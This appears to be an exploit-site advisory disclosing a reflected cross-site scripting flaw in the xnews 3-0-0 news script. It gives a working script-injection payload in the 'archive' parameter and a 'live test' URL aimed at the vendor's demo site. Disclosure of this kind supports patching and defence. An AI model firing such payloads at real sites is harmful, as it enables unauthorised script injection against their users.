xnews 3-0-0 Cross Site Scripting

2014.04.26

Credit: kurd-team

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

===========================================================
xnews3-0-0 XSS Vulnerability
-----------------------------------------------------------
foun by :kurd-team , Exploiter
group : kurdish hackers team
contact : pshela@yahoo.com
site : kurdsystem.com
-----------------------------------------------------------
------------------------script-----------------------------
-----------------------------------------------------------
script :xnews3-0-0
site :http://www.xpression-news.com
download : http://www.xpression-news.com/downloads/xnews3-0-0RC2.zip
-----------------------------------------------------------


Exploit:
--------

Exmple:
-------
/path/index.php?archive="><script>alert('kurdsystem')</script>

live teast :
http://xpression-news.com/demos/xnews3-0-0/index.php?archive="><script>alert('kurdsystem')</script>
-----------------------------------------------------------
dyari bo hamu hackerani kurd :Zryan_kurd , all Member kurdsystem.com
-----------------------------------------------------------

References:

http://www.xpression-news.com/downloads/xnews3-0-0RC2.zip

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

xnews 3-0-0 Cross Site Scripting

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.